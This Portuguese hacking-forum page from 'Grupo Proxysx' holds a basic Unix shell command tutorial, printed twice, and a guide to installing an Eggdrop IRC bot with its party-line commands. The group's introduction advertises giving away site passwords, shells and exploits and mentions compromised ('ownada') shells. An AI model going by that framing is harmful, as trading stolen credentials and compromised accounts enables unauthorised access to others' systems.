Grupo Proxysx
Quem Somos:
O Grupo Proxysx a mais de 5 anos trabalhando para tornar a Internet mais FREE para todos, é um grupo de “Hackers do Bem” que trabalham juntos em equipe, trocando informações entre si, testando as vulrabilidades dos sistemas com objetivo que essas vulrabilidades sejam solucionadas pelos Admins. O grupo também distribui gratuitamente shells, psybncs, eggdrops, proxys, senhas de sites, tutoriais, xploits, programas e tudo que esteja relacionado com TI.
A Missão:
A nossa missão é pelo fórum fornecer informações que são difícil de ser encontradas na Internet ou necessitam ser pagas para obtê-las, dessa forma criar uma grande comunidade de troca de informações e aprendizado mutuo.
A Equipe:
O Grupo Proxysx é formado pelos Administradores, Moderadores e Usuários Comuns:
Administradores: eles representam a Staff da equipe, é o escalão mais alto do grupo, onde se encontram os usuários mais antigos do grupo, que mais ajudaram e promoveram a funcionalidade do Grupo Proxysx.
Moderadores: são de fato futuros administradores, eles são responsáveis de manter o fórum atualizado, devem ter uma participação ativa e funcional perante os Usuários Comuns.
Usuários Comuns: São todos os usuários do fórum aprovados pelos administradores, cabe a eles participar do fórum, postando e respondendo aos tópicos do fórum com um conteúdo valido que venha acrescentar, não são tolerados tópicos e resposta com Spam e Flood.
O Fórum
O Grupo Proxysx funciona no Fórum, a rede de irc é apenas uma extensão da equipe, o que realmente é valido é a participação dentro do fórum que é dividido em 3 partes:
Proxysx Área VIP: Nessa área apenas os Administradores tem acesso, é a área onde são postadas os conteúdos mais raros, onde as senhas nunca são trocadas, onde o acesso é mantido para que todos possam usar.
VIP Moderação: Nessa área apenas os Moderadores e Administradores tem acesso, nessa área as senhas também não são mudadas, se isso ocorrer caberá as ações presente as regras internas da área. Não pode haver posts inválidos nessa área.
Área Aberta: Nessa área todos os Usuários Comuns aprovados pelos administradores tem acesso, Todo usuário que participa do fórum , que deixa sua contrubuição no fórum poderá ser convidado a ser moderador do fórum. Usuários que não participarem do fórum terão suas contas deletadas sem aviso prévio.
Nossos Projetos:
O Grupo Proxysx está desensenvolvendo os seguintes projetos:
1- Criação de uma grande rede de irc, com objetivo de substituir a rede Undernet e integrar MSN com MIRC, A nova rede BRundernet já está em desenvolvimento, mais detalhes: www.projeto-mirc.co.nr
2- Criação de uma empresa de servidores de Games Online (MMORPG), com objetivo de criar servidores de Lineage II, Tibia, Mu Online, Counter Strike etc, Os Administradores e Moderadores do Grupo Proxysx vão formar o corpo da Staff dos servidores de Games, vai ser desenvolvido sistema de “Donate” e “vip” como forma de recolher doações que irão manter os servidores onlines e de grátis para todos.
By XKN – Diretoria
_________________
By XKN @ -= ProxysX GrouP =-
quinta-feira, 24 de março de 2011
TUTO - Comandos básicos na Shell
# ---------------------------------------------------------------
# TUTO PRINCIPAIS COMANDOS DE SHELL
#----------------------------------------------------------------
Esse tutorial pertence: PROXYSX
------------------------------------------------------------------
Pequeno tutorial sobre comandos de shell para você se familiarizar.
ls - Comando para listar diretorios (ls -l; ls -la)
mkdir - Cria diretórios, lembrando que no UNiX os nomes podem ser
extendidos e há diferença entre maiúsculo e minúsculo.
cp - Copia arquivos ou diretórios (-r) de um lugar para outro (ex: cp
/home/eggdrop /home/meubot)
mv - Move arquivos ou diretórios (-r) de um lugar para outro. (ex: mv
/home/eggdrop /home/meubot)
cd - Comando para acessar diretorio.
cd.. - volta ao ultimo diretório.
que estava, cd entra no seu home.
df - Mostra quanto espaço livre/ocupado de cada partição montada.
free - Mosta a quantidade de memória e de swap livre e/ou ocupada.
ps wx - Mostra todos os processos que você esta rodando; "ps auxw"
mostra todos os processos, seus respectivos donos e quanto cada um
esta ocupando de processamento e memória.
ps x - Geralmente usado para listar os processos do usuario na shell com seus respectivos PIDs.
rar - Compactador RAR igual ao do Ms-DOS. Para compactar em discos de
10Mb use: rar a -r -v10000 (nome_do_arquivo)
rm -rf - Remove arquivos e/ou diretórios, muito cuidado ao usar com rm -rf *
last - Mostra a tabela de logins efetuados. Digite: "last | more" ou
digite "last fulano" para ver os ultimos logins do fulano. Vale
lembrar que a tabela de logins é apagada pelo sistema todo mês
who ou w - Mostra quais e quantos usuários estão logados na máquina
passwd - Altera seu password, digite "passwd" e ele pedirá um novo
password. Esse programinha é muito chato, não deixa você colocar
qualquer senha.
pico - Ótimo editor de texto, para salvar ctrl+o, para sair ctrl+x,
para procurar por uma palavra digite ctrl+w.
vi - Outro editor de texto semelhante ao pico.
kill -9 - Mata um processo, quando der "ps x" você verá o número (PID)
de cada processo. Digite: kill -9 PID
lynx - Browser em modo texto para HTML e FTP.
mc - MidNight Commander, ótimo gerenciador de arquivos.
finger - Mostra informações básicas de um usuário da shell (ex: finger fulano)
locate - Localiza um arquivo ou diretório, aceita coringas.
pwd - Mostra o atual diretório em que você se encontra.
du - Mostra quanto está ocupando o diretório onde você está.
date - Mostra a data e a hora.
ln -s - Cria um link simbólico para um arquivo ou diretório.
tar+gzip - Para descompactar um arquivo .tar.gz digite: "tar -xzvf
nome_do_aquivo.tar.gz". Compactar: digite "tar czvf arquivo.tar.gz *"
para compactar tudo como arquivo.tar.gz
chmod - Altera atributos do arquivo, utiliza formato octal
- chmod 770 arquivo seta as permissões do arquivo como executável
- chmod 660 arquivo seta as permissões de leitura e escrita para o arquivo
- chmod 550 arquivo seta a permissão de leitura para o arquivo
talk - Chama um usuário logado para chat ex: "talk fulano", o fulando
deve responder: "talk ciclano".
quota - Mostra quanto de espaço em disco você tem direito. Digite:
quota nome_do_usuario
ftpwho - Mostra quem esta logado por FTP
less - Serve para visualizar arquivos texto. Normalmente visualizamos
documentos, instruções para instalação de aplicativos. Ex: "less
/usr/doc/HOWTO/Firewall"
TAB - A tecla de tabulação tem a função de autocompletar os nomes.
para entrar num diretório grande basta digitar cd
inicio_do_nome_do_dir e TAB ele completa o resto. Não autocompleta
quando tiver arquivos com o mesmo radical!
cat /etc/hosts - Veja os vhosts da shell
/sbin/ifconfig |grep inet - veja os ips da shell
perl - usado pelos owners para reconfigura portas em programas dentro da shell , ele edita um arquivo criando sub arquivos que almenta a extenxão de reconhecimento desse arquivo.
help - mostra os comandos basicos da shell e suas sintaxes...
Download dentro da shell:
wget url
lynx -source url > arquivo
curl -o arquivo url
GET url > arquivo
OBS: algumas shells saum editadas ou podem usar kernels kom outro tipo de interface de linguagem, ou ateh msm conter problemas ao interpretar comandos ( akontece muitu em shell ownada) por issu dependendo da shell o komando funciona ou não
# TUTO PRINCIPAIS COMANDOS DE SHELL
#----------------------------------------------------------------
Esse tutorial pertence: PROXYSX
------------------------------------------------------------------
Pequeno tutorial sobre comandos de shell para você se familiarizar.
ls - Comando para listar diretorios (ls -l; ls -la)
mkdir - Cria diretórios, lembrando que no UNiX os nomes podem ser
extendidos e há diferença entre maiúsculo e minúsculo.
cp - Copia arquivos ou diretórios (-r) de um lugar para outro (ex: cp
/home/eggdrop /home/meubot)
mv - Move arquivos ou diretórios (-r) de um lugar para outro. (ex: mv
/home/eggdrop /home/meubot)
cd - Comando para acessar diretorio.
cd.. - volta ao ultimo diretório.
que estava, cd entra no seu home.
df - Mostra quanto espaço livre/ocupado de cada partição montada.
free - Mosta a quantidade de memória e de swap livre e/ou ocupada.
ps wx - Mostra todos os processos que você esta rodando; "ps auxw"
mostra todos os processos, seus respectivos donos e quanto cada um
esta ocupando de processamento e memória.
ps x - Geralmente usado para listar os processos do usuario na shell com seus respectivos PIDs.
rar - Compactador RAR igual ao do Ms-DOS. Para compactar em discos de
10Mb use: rar a -r -v10000 (nome_do_arquivo)
rm -rf - Remove arquivos e/ou diretórios, muito cuidado ao usar com rm -rf *
last - Mostra a tabela de logins efetuados. Digite: "last | more" ou
digite "last fulano" para ver os ultimos logins do fulano. Vale
lembrar que a tabela de logins é apagada pelo sistema todo mês
who ou w - Mostra quais e quantos usuários estão logados na máquina
passwd - Altera seu password, digite "passwd" e ele pedirá um novo
password. Esse programinha é muito chato, não deixa você colocar
qualquer senha.
pico - Ótimo editor de texto, para salvar ctrl+o, para sair ctrl+x,
para procurar por uma palavra digite ctrl+w.
vi - Outro editor de texto semelhante ao pico.
kill -9 - Mata um processo, quando der "ps x" você verá o número (PID)
de cada processo. Digite: kill -9 PID
lynx - Browser em modo texto para HTML e FTP.
mc - MidNight Commander, ótimo gerenciador de arquivos.
finger - Mostra informações básicas de um usuário da shell (ex: finger fulano)
locate - Localiza um arquivo ou diretório, aceita coringas.
pwd - Mostra o atual diretório em que você se encontra.
du - Mostra quanto está ocupando o diretório onde você está.
date - Mostra a data e a hora.
ln -s - Cria um link simbólico para um arquivo ou diretório.
tar+gzip - Para descompactar um arquivo .tar.gz digite: "tar -xzvf
nome_do_aquivo.tar.gz". Compactar: digite "tar czvf arquivo.tar.gz *"
para compactar tudo como arquivo.tar.gz
chmod - Altera atributos do arquivo, utiliza formato octal
- chmod 770 arquivo seta as permissões do arquivo como executável
- chmod 660 arquivo seta as permissões de leitura e escrita para o arquivo
- chmod 550 arquivo seta a permissão de leitura para o arquivo
talk - Chama um usuário logado para chat ex: "talk fulano", o fulando
deve responder: "talk ciclano".
quota - Mostra quanto de espaço em disco você tem direito. Digite:
quota nome_do_usuario
ftpwho - Mostra quem esta logado por FTP
less - Serve para visualizar arquivos texto. Normalmente visualizamos
documentos, instruções para instalação de aplicativos. Ex: "less
/usr/doc/HOWTO/Firewall"
TAB - A tecla de tabulação tem a função de autocompletar os nomes.
para entrar num diretório grande basta digitar cd
inicio_do_nome_do_dir e TAB ele completa o resto. Não autocompleta
quando tiver arquivos com o mesmo radical!
cat /etc/hosts - Veja os vhosts da shell
/sbin/ifconfig |grep inet - veja os ips da shell
perl - usado pelos owners para reconfigura portas em programas dentro da shell , ele edita um arquivo criando sub arquivos que almenta a extenxão de reconhecimento desse arquivo.
help - mostra os comandos basicos da shell e suas sintaxes...
Download dentro da shell:
wget url
lynx -source url > arquivo
curl -o arquivo url
GET url > arquivo
OBS: algumas shells saum editadas ou podem usar kernels kom outro tipo de interface de linguagem, ou ateh msm conter problemas ao interpretar comandos ( akontece muitu em shell ownada) por issu dependendo da shell o komando funciona ou não
TUTO = Eggdrop (completo)
# ---------------------------------------------------------------
# TUTO Rodando EGGDROP na shell
#----------------------------------------------------------------
1) Conecte-se à shell usando um programa como putty.exe (abaixeo em
www.superdownloads.com.br), Execute o
programa, nele ponha o ip-da-shell, porta, Protocolo da shell e mande
conectar, agora ponha o user e password,
Dentro da shell baixe a psybnc, digitando:
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19.tar.gz
(vc pode encontrar mais links de eggdrop nesse site = http://www.egghelp.org/files.htm)
[root@ns xkn]# wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19. tar.gz
--16:00:47-- ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19.tar.gz
=> `eggdrop1.6.19.tar.gz'
Resolviendo ftp.eggheads.org... hecho.
Conectando con ftp.eggheads.org[208.68.107.168]:21... conectado.
Identificándose como anonymous ... ¡Dentro!
==> SYST ... hecho. ==> PWD ... hecho.
==> TYPE I ... hecho. ==> CWD /pub/eggdrop/source/1.6 ... hecho.
==> PORT ... hecho. ==> RETR eggdrop1.6.19.tar.gz ... hecho.
Longitud: 1,033,152 (probablemente)
100%[====================================>] 1,033,152 43.99K/s ETA 00:00
16:01:13 (43.99 KB/s) - `eggdrop1.6.19.tar.gz' guardado [1033152]
apois fazer o download, vamos discompactar:
Verifique como o arquivo foi abaixado na shell:
ls
[root@ns xkn]# ls
eggdrop1.6.19.tar
nesse caso vc vai descompactar assim:
tar -xvf eggdrop1.6.19.tar
eggdrop1.6.19/src/mod/assoc.mod/language/
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.french.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.finnish.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.german.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.english.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.danish.lang
eggdrop1.6.19/src/mod/assoc.mod/assoc.h
eggdrop1.6.19/src/mod/assoc.mod/modinfo
eggdrop1.6.19/src/mod/seen.mod/
eggdrop1.6.19/src/mod/seen.mod/Makefile
eggdrop1.6.19/src/mod/seen.mod/help/
eggdrop1.6.19/src/mod/seen.mod/help/seen.help
eggdrop1.6.19/src/mod/seen.mod/help/msg/
eggdrop1.6.19/src/mod/seen.mod/help/msg/seen.help
eggdrop1.6.19/src/mod/seen.mod/seen.c
eggdrop1.6.19/src/mod/seen.mod/modinfo
eggdrop1.6.19/src/mod/filesys.mod/
ggdrop1.6.19/src/modules.h
eggdrop1.6.19/src/stat.h
eggdrop1.6.19/src/misc_file.c
eggdrop1.6.19/CONTENTS
eggdrop1.6.19/text/
eggdrop1.6.19/text/banner
eggdrop1.6.19/text/motd.finnish
eggdrop1.6.19/text/motd
eggdrop1.6.19/text/CONTENTS
eggdrop1.6.19/configure
eggdrop1.6.19/disabled_modules
eggdrop1.6.19/logs/
eggdrop1.6.19/logs/CONTENTS
eggdrop1.6.19/Makefile.in
eggdrop1.6.19/language/
eggdrop1.6.19/language/core.finnish.lang
eggdrop1.6.19/language/core.english.lang
eggdrop1.6.19/language/core.french.lang
eggdrop1.6.19/language/core.german.lang
eggdrop1.6.19/language/core.danish.lang
Apois decompactar entre na pasta que foi criada
[root@ns xkn]# ls
eggdrop1.6.19 eggdrop1.6.19.tar
cd eggdrop1.6.19
[root@ns xkn]# cd eggdrop1.6.19
[root@ns eggdrop1.6.19]#
então faxa esse comando:
./configure
Agora nois precisamos da .conf, vc deve abaixar ela da maquina e editar e fazer upload novamente para dentro da pasta eggdrop1.6.19...
o nome do arquivo é eggdrop.conf
[root@ns eggdrop1.6.19]# ls
CONTENTS Makefile.in configure.ac logs
COPYING NEWS disabled_modules misc
ChangeLog README doc scripts
FEATURES aclocal.m4 eggdrop.conf src
INSTALL config.h.in help text
Makefile configure language
Use o ftp para isso, caso vc não consigar acessar a shell por ftp, vc pode abaixar o eggdrop.conf nesses links:
Arquivo Original para verção mais nova:
http://www.freewebs.com/protonyc/eggdrop.conf
Arquivos editados:
http://www.freewebs.com/protonyc/Conf_para_eggdrop.txt
http://www.mateus07.xpg.com.br/eggdrop_exemplo.conf
depois configure o arquivo eggdrop.conf usando o bloco de notas, salve com outro nome, ponha o nome do bot no arquivo assim por exemplo BotXkN.conf e hospede ele num site free, tipo rapidshare, e faça denovo o download do msm para dentro da shell, dentro da pasta eggdrop1.6.19...
agora vc vai execultar o arquivo ferente a conf:
./eggdrop -m BitXkN.conf
depois para votar o bot so fazer ./eggdrop BitXkN.conf
pronto, so esperar que o eggdrop vai entrar na rede e canis que vc configurou na .conf ... depois basta interagir com ele usando o login e senha admin que vc configurou na .conf ... abrir dcc chat pronto
# ---------------------------------------------------------------
# TUTO EGGDROP
#----------------------------------------------------------------
Esse tutorial pertence: PROXYSX
AGORA VC IRA CONFIGURAR PASSO A PASSO SEU BOT, NESSE TUTORIAL TEM TDS
OS RECUSOS NECESSARIOS PARA ISSO E MAIS UM POUKO
LEIA ATENTAMENTE O TUTORIAL TODO PRIMEIRO ANTES DE TENTALO EXEKUTALO.
A UNIKA KOIZA K FOLTA NESSE TUTORIAL É A CONFIGURAXAUM DA .conf, KE EM
BREVE IREI POSTAR.
ESSE TUTORIAL FOI TESTADO E CRIADO EM BASE DO eggdrop1.6.1 e eggdrop1.6.17.
O que é um eggdrop?
Um eggdrop é um bot de IRC, escrito em C. Se você não sabe o que é
IRC, isto não é o que você está precisando! Um eggdrop é um bot que
fica num canal e tomar medidas preventivas para: evitar que o canal
seja tomado (as poucas medidas que qualquer coisa pode fazer),
reconhecer usuários ou endereços banidos e os expulsar, reconhecer
usuários especiais e lhes dar op, etc.
Um dos recursos exclusivos do eggdrop é sua "party line", acessível
via DCC Chat, que lhe permite falar com outras pessoas sem lag.
Considere-a um DCC chat múltiplo ou uma miniatura de IRC (inclusive
com canais). Você conectar com outros bots e expandir a party line até
ela se tornar algo próximo ao IRC.
O eggdrop está sendo sempre aprimorado e ajustado porque seu autor
nunca está realmente satisfeito com ele. De fato, ele existiu por
alguns anos com versões de 0.7 a 0.9 até que finalmente se tornou o
1.0. Um grande esforço foi feito para detectar e remover bugs.
Problemas devem ser raros.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------
# CONFIGURANDO O BOT PELA PRIMEIRA VEZ
#----------------------------------------------------------------
Bem, a forma de configurar o bot varia de verxão pra verxão, a forma k
irei mostrar agora é a mais correta para
a maioria dos bots, cazo note algu de estranhu durante a configuraxaum
do seu bot, pare e refaxa os passos, se percistir o
error prokure outru tutorial diferente desse k configure seu bot kom
essatidaum, erros durente a configuraxaum vaum kauzar
probleminhas e maul funcionamento do bot.
CONFIGURAXAUM NA SHELL:
Antes de rodar o bot na shell vc preciza do Tcl ( um script de
interpretaxaum para bot, ele determina a linguagem dos comandos )
na maioria dos sistemas ja vem com ele pre instalados, você pode
checar digitando o comando:
tclsh
Se funcionar, você receberá um prompt '%', digite:
exit
para sair do programa, se acazo isso naum aparecer o prompt vc devera
que abaixo lo tente o site:
ftp://ftp.eggheads.org/pub/tcl
ABAIXAINDO O BOT:
- para abaixar o bot para shell precizara de um link, tente esse
abaixo, se naum funcionar pergunte no knal PROXYSX :
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.17.tar.gz
- Voce precisa extrair os arquivos do EggDrop para um diretório.
Digite o comando:
tar -xvzf eggdrop1.6.17.tar.gz
Obs.: Aguarde enquanto o Computador extraia todos os arquivos.
- Será criado um diretório chamado eggdrop1.6.17 no diretório corrente.
Agora, precisa de entrar dentro dele.
Digite o comando:
cd eggdrop1.6.17
- Agora, você está dentro do Diretório do EggDrop. A partir desse
momento, voce comeca a compilaçao do
EggDrop propriamente dita. Para isso, digite:
./configure
Obs.: Aguarde enquanto ele faz a configuraçao inicial.
- Agora voce tem que fazer a configuraçao, irá aparecer para voce:
"Type 'make config' to configure the modules, or type 'make iconfig'
to interactively choose which modules to compile."
Entao, como o Programa te retornou, digite:
make config
- Aguarde até terminar e quando voltar para a shell e digite:
make
- Vai aparecer a mensagem "Now run "make install" to install your
bot.", entao, digite:
make install
- Irá aparecer a mensagem:
"Installation completed.
You MUST ensure that you edit/verify your configuration file.
An example configuration file, eggdrop.conf, is distributed with Eggdrop.
Remember to change directory to /home/popsoft/eggdrop before you proceed."
Obs.: Está instalado corretamente o EggDrop. =)
- Voce precisa agora ir para o diretório correto, no caso eggdrop. Entao digite:
cd ..
cd eggdrop
Apois abaixar o bot na shell, deskompaktalo, va para a pasta do bot (
exemplo eggdrop1.6.1 e eggdrop1.6.17 ) e faxa:
./configure
make config
make
make install
Isso criará o diretorio "eggdrop" que é para onde as .conf deverão ser enviadas.
CONFIGURAXAUM DA .conf :
Bem eu fiz uma .conf aki, mas esta kom alguns erros, irei korrijilos e
postar, se vc naum sabe configurar uma .conf va
ate o google e prokure (afinal esse tutorial naum é pra amadores)
PS --> lembrese que logu a pois de configurar a .conf copie ela para o
diretorio "eggdrop".
RODANDO O BOT:
Com a .conf no diretorio "eggdrop" , Agora vc rodara o bot na shell ou
rodar a .conf no bot, dijitando
./eggdrop -m eggdrop.conf
Se a shell cair ou o bot, basta digitar para ele voltar ( esse comando
serve kuandu o bot kai e sisma naum voltar):
./eggdrop eggdrop.conf (não é necessario o -m)
Motivo para não botar o -m novamente:
Quando você for rodar o Eggdrop pela primeira vez, o eggdrop criará os
arquivos .chn e .usr, nesses arquivos serão
gravados os canais e os users cadastrados no Bot.
--> PS IMPORTANTE :
bem o nome da .conf é referente o nick do bot, pois naum pode haver 2
.conf do msm nome, para ajudar vc se
organivar renomeie a .conf reverente o nick do bot exemplo: nick do
bot: "XKN-BOT", nome da .conf: xknbot.conf.
sakou!! bem simples
CONTINUANDO:
Para evitar que vc tenha k voltar toda vez que seu bot kaia ou seja
reniciado, ou a shell cai e volte vc tem k por
um crontab no bot assim:
Copie de dentro da pasta "scripts" que está dentro da pasta "eggdrop"
o arquivo: autobotchk e bote na pasta eggdrop. Digite:
chmod +x autobotchk
./autobotchk eggdrop.conf -15 noemail-
CONECTANDO O BOT NO IRC:
Assim qu vc rodar o bot na shell ele ira conectar sozim no irc devidu
as configuraxaos do .conf,
kuando o bot entrar no irc digite:
/msg NICK_DO_BOT hello
Em seguida digite:
/msg NICK_DO_BOT pass UMA_SENHA
Isso configura uma senha pro bot, naum exkexa ela, vc tera k ultilizara ela.
Agora entre na Party-line, onde vc ira accessar o bot para isso mande
um dcc chat para o bot:
/dcc chat NICK_DO_BOT
Quando o bot receber o dcc chat, vai pedir a senha que você setou,
digite-a e você entrará na Party-line do bot.
# ---------------------------------------------------------------
# COMANDOS DA Party-line (VIA DCC CHAT)
#----------------------------------------------------------------
Controle do canal
.kick nick motivo: Kicka alguém do canal.
.kickban nick motivo: Kicka e banir alguém do canal.
.op nick #canal: Da Op a alguém.
.deop nick #canal: Tira Op de alguém.
.voice nick: Da Voice a alguém.
.devoice nick: Tira Voice de alguém.
.bans: Ver os bans atuais do bot.
.bans all: Ver todos os bans.
.resetbans: Remover todos os bans do canal.
.+ban mascara pro ban(ex.: *!*fulano@*.provedor.com.br): Adiciona um
ban permanente.
.-ban numero do ban: Remover um ban permanente.
.topic #canal topic: Troca o tópico de um canal.
.mode modos: Troca os modos de um canal.
Users
.adduser nick: Adicionar um novo user.
.-user nick: Retirar um user do bot.
.+host nick host: Adiciona um host.
.-host nick host: Remove um host.
.chattr +(-) flag nick: Adicionar users avançados.
Notes
.note nick mensagem: Escrever um note para alguem.
.notes read numero da nota: Ler um note.
.notes read: Ler todas as notes.
.notes erase numero da note: Apaga uma note.
.notes erase: Apaga todas as notes.
.note index: Listar notes.
.banner mensagem para enviar: Banner.
Senhas
.newpass nova senha: Mudar sua senha.
.chpass nick senha: Mudar senha de use.
.checkpass: Encontrar users sem pass.
Área de arquivos
.files: Entrar na área de arquivos.
quit: Sair da área de arquivos.
ls: Lista arquivos.
get arquivo para pegar nick: Pegar arquivo.
Outras
.+chan #canal: Adicionar o bot em um canal.
.-chan #canal: Tirar o bot de um canal.
.who: Lista os usuarios na Party Line.
.whois nick: Mostra as informacoes de alguém.
.rehash: Recarrega o BOT.
.save: Salva tudo que você fez no bot.
.stats: Para ver a estatistica no canal na pl.
.jump: server Muda o server do bot.
.die msg: Kila o bot deixando uma msg. Desconecta o bot.
.addlog texto: Acrescenta um texto ao log. Pode ser útil se alguém for
ler o log depois.
.away texto: Marca você como away na party line. Para deixar de estar
marcado como away digite .back ou .away
.botinfo: Mostra os dados dos bots que estão conectados à botnet.
.bots: Mostra os bots conectados a este através de uma botnet.
.bottree: Mostra os bots na botnet e como eles estão conectados
.chat canal: Muda o canal interno do bot em que você está. .chat off
lhe retira de todos os canais internos do bot, mas sem perder conexão
ao bot.
.console #canal modos: Muda as opções do seu console. Apenas .console
mostra o console atual. Os masters podem mudar o console de outro
usuário com .console usuário #canal modos. Os modos possíveis são:
m - Mostra as mensagens e ctps para o bot
p - Mostra o texto do canal
k - Mostra os kicks, bans e mudanças de modos do canal
j - Mostra os joins, part, mudança de nick, quit, etc do canal
b - Mostra a atividade de bots linkando ou deslinkando e
compartilhando usuários
s - Mostra as mensagens do servidor de IRC como servidores
conectando e netsplits.
w - Mostra os wallops dos ircops da rede
Apenas para masters de canal:
c - Mostra os comandos mandados pelos usuários
o - Mostra os outros tipos de mensagens
Apenas para masters:
x - Mensagens referentes a parte de transferência de arquivos
d - Mensagens de debug, que interessam apenas aos programadores
Apenas para owners:
r - Mostra todas as mensagens recebidas do servidor
v - Mostra todas as mensagens mandadas para o servidor
.echo on|off: Liga ou desliga o echo, ou seja, a repetição de todo
texto que você manda para a partyline.
.fixcodes: Troca o tipo de conexão de telnet para DCC e vice-versa
para quando o bot interpreta errado o tipo de conexão.
.match flags #canal começo fim
ou
.match texto começo fim: Mostra a lista de usuários que tem certo
acesso ou que encaixam em certo texto. Por exemplo: .match +m: mostra
todos os masters. Como este comando mostra apenas 20 usuários de cada
vez você deve usar os paramêtros de começo e fim para ver o resto. Por
exemplo: .match *.br 61 70
.me texto: Equivalente ao /me dos clientes de IRC, só que manda para a
partyline.
.motd: Mostra aquela mensagem que você vê quando conecta ao bot
.nick novo_nick: Muda o nick (handle) pelo qual o bot lhe conhece.
.note nick[@bot]: texto Manda uma nota para algum outro usuário do bot
.newpass senha: Troca sua senha no bot
.page numero|off: Muda o número de linhas que o bot lhe manda de cada
vez. Inútil em casos em que você pode rolar a tela como nos clientes
de IRC atual.
.quit [comentário]: Desconecta do bot.
.strip modos: Remove ou recoloca (-modo ou +modo) um dos modos de
texto, os modos possíveis são: b (negrito), r (video inverso), u
(sublinhado), a (códigos ansi), g (código bell). Isto é útil apenas se
você tem um cliente de IRC muito antigo e defasado.
.su usuario [senha]: Muda o usuário com que você está logado no bot.
Se você for o owner pode mudar para qualquer outro, caso contrário
precisa da senha. Útil para um recurso de segurança que é sempre logar
no bot como usuário comum e só se tornar owner quando for necessário e
depois de ter certeza que é o bot certo.
.trace bot: Mostra o caminho até outro bot da mesma botnet
.who [bot]: Mostra os usuários conectados ao bot e seus dados básicos
.whois nick: Mostra os dados de um usuário. Para mais explicações
sobre as flags.
.whom #canal: Mostra os usuários na partyline conjunta do bot, que
pode incluir usuários em outros bots se o bot estiver numa botnet
Comandos via dcc para masters de botnets
.boot nick[@bot]: Chuta alguém da partyline. O owner do bot não pode
ser chutado.
.+bot bot endereço:porta [máscara]: Adiciona um registro para um novo
bot na botnet
.-bot bot :Retira o registro de um bot
.chaddr bot endereço:porta: Muda o endereço de um bot
.chattr nick flags canal: Muda as flags de um usuário. Um owner
permanente (definido no arquivo de configuração do bot) não pode ser
removido. Exemplo: .chattr nick +o #teste. Digitar apenas o nick, sem
flags, mostra as flags atuais do usuário.
.chnick nick_velho nick_novo: Muda o nick (handle) pelo qual o bot
conhece o usuário
.chpass nick nova_senha: Muda a senha de alguém
.+host nick máscara: Acrescenta uma máscara (host) ao registro de alguém.
.-host nick máscara: Retira uma máscara (host) do registro de alguém.
.link bot1 [bot2]: Manda o bot1 se ligar ao bot2, se você digitar
apenas um bot seu bot tentará se conectar a ele.
.relay bot: Faz sua conexão ser passada para outro bot, ou seja,
funciona como se você conectasse ao outro bot.
.unlink bot: Desconecta um bot. Atenção: .unlink * desconecta o seu
bot da botnet.
Comandos via DCC para Masters do BOT
.banner texto: Manda uma mensagem para todas as pessoas conectadas no
bot naquele momento.
.binds [tipo] [all]: Mostra os binds, ou seja, comandos que ativam o
bot. O tipo pode ser dcc, msg, etc. Se você digitar all ele mostra
também os binds que ativam os comandos internos do eggdrop.
.chattr nick flags #canal: Muda as flags de um usuário. Um owner
permanente (definido no arquivo de configuração do bot) não pode ser
removido. Exemplo: .chattr nick +o #teste. Digitar apenas o nick, sem
flags, mostra as flags atuais do usuário.
.comment nick texto: Acrescenta um comentário ao registro do usuário,
este comentário só pode ser vistos por masters e usando os comandos
match ou whois.
.dccstat: Mostra todas as conexões atuais do bot.
.debug: Mostra os detalhes da ocupação de memória do bot se ele tiver
sido compilado para permitir isso. Útil apenas para programadores
experientes.
.+ignore máscara comentário: Faz o bot ignorar uma pessoa até que
outro master retire a máscara da lista de ignores.
.-ignore máscara|número: Retira um ignore.
.ignores [máscara]: Mostra as máscaras atualmente na lista de ignore
do bot e informações básicas sobre estes ignores.
.save: Faz o bot salvar os dados de usuários e canais. Normalmente o
bot já faz isto automaticamente uma vez por hora.
.rehash: Salva os arquivos de usuários e canais e depois carrega todos
os arquivos novamente, inclusive o arquivo de configuração. Útil para
acrescentar ou modificar tcls e configurações sem fazer o bot sair do
canal.
.reload: Recarrega o arquivo de usuários diretamente do disco,
esquecendo os dados na memória no momento. Cuidado que este comando
pode fazer o bot perder dados relativos a usuários.
.restart: Descarrega tudo da memória e reinicializa o bot. Cuidado que
este comando faz o bot desconectar do servidor de IRC.
.status [all]: Mostra uma série de dados sobre o bot, se você
acrescentar all verá ainda mais dados. Veja a ajuda interna do eggdrop
para mais detalhes.
.+user nick máscara: Acrescenta um usuário com a máscara dada.
.-user nick: Retira o registro de um usuário
Comandos via DCC para Owners
.die [razão]: Faz o bot morrer, ou seja, desconectar e parar de rodar.
.loadmod modúlo: Carrega um módulo, trecho de programação que pode ser
acrescentado ao eggdrop padrão. Não confunda com scripts em tcl que
não precisam deste comando.
.module [módulo]: Mostra a lista de módulos ou um módulo específico de
seu bot e algumas informações sobre cada um.
.modules bot: Mostra os módulos carregados em outro bot da botnet.
.rehelp: Faz o bot atualizar seus arquivos de ajuda interna.
.set variável [valor]: Mostra o valor de uma variável interna do bot
ou, se for dado um valor, muda o valor da variável. A lista de
variáveis pode ser vista com .help set.
.simul nick texto: Faz parecer que o nick digitou o texto que você
quiser, inclusive comandos. Este comando pode ser desabilitado na
configuração do bot. Cuidado com este comando.
.tcl comando: Comando para mandar comandos ao bot como se fosse um
script tcl. Pode ser desabilitado na configuração e é muito perigoso,
pois o menor erro pode trazer problemas para o bot.
.unloadmod módulo: Descarrega um módulo da memória do computador.
Chattr(no bot)
.chattr nick +ofp: Bota um usuário com as flags +ofp no bot.
.chattr nick +o: Bota um usuário com a flag +o no bot.
.chattr nick -o: Retira um usuário com a flag +o no bot.
.chattr nick +f: Bota um usuário com a flag +f no bot.
.chattr nick -f: Retira um usuário com a flag +f no bot.
.chattr nick +p: Bota um usuário com a flag +p no bot(acesso a party-line).
.chattr nick -p: Retire um usuário com a flag +p no bot(acesso a party-line).
.chattr nick +d: Bota um usuário com a flag +d no bot(auto deop).
